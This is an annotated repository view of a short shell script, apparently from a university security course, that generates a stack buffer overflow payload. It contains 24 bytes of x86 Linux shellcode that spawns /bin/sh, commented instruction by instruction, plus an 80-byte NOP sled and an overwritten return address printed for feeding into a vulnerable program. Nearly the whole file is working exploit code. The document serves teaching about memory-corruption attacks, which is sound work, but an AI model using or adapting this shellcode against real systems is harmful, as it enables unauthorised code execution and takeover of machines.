| author | Christian Urban <christian dot urban at kcl dot ac dot uk> | 
| Fri, 06 May 2016 13:15:08 +0100 | |
| changeset 455 | 2d9e005100f4 | 
| parent 400 | f05368d007dd | 
| permissions | -rwxr-xr-x | 
| 27 | 1 | #!/bin/sh | 
| 2 | ||
| 115 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 3 | # shellscript that overwrites the buffer with | 
| 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 4 | # some payload for opening a shell (the payload | 
| 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 5 | # cannot contain any \x00) | 
| 27 | 6 | |
| 7 | ||
| 400 
f05368d007dd
updated
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
201diff
changeset | 8 | shellcode="\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62 | 
| 
f05368d007dd
updated
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
201diff
changeset | 9 | \x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80" | 
| 27 | 10 | |
| 11 | # 24 bytes of shellcode | |
| 12 | ||
| 13 | # "\x31\xc0" // xorl %eax,%eax | |
| 14 | # "\x50" // pushl %eax | |
| 15 | # "\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e | |
| 16 | # "\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f | |
| 17 | # "\x89\xe3" // movl %esp,%ebx | |
| 18 | # "\x99" // cltd | |
| 19 | # "\x52" // pushl %edx | |
| 20 | # "\x53" // pushl %ebx | |
| 21 | # "\x89\xe1" // movl %esp,%ecx | |
| 22 | # "\xb0\x0b" // movb $0xb,%al | |
| 23 | # "\xcd\x80" // int $0x80 | |
| 24 | ||
| 25 | padding=`perl -e 'print "\x90" x 80'` | |
| 26 | ||
| 115 
c4008b31df8e
added material
 Christian Urban <christian dot urban at kcl dot ac dot uk> parents: 
27diff
changeset | 27 | # need s correct address in order to run | 
| 27 | 28 | printf $shellcode$padding"\xe8\xf8\xff\xbf\x00\x00\x00\x00" | 
| 29 |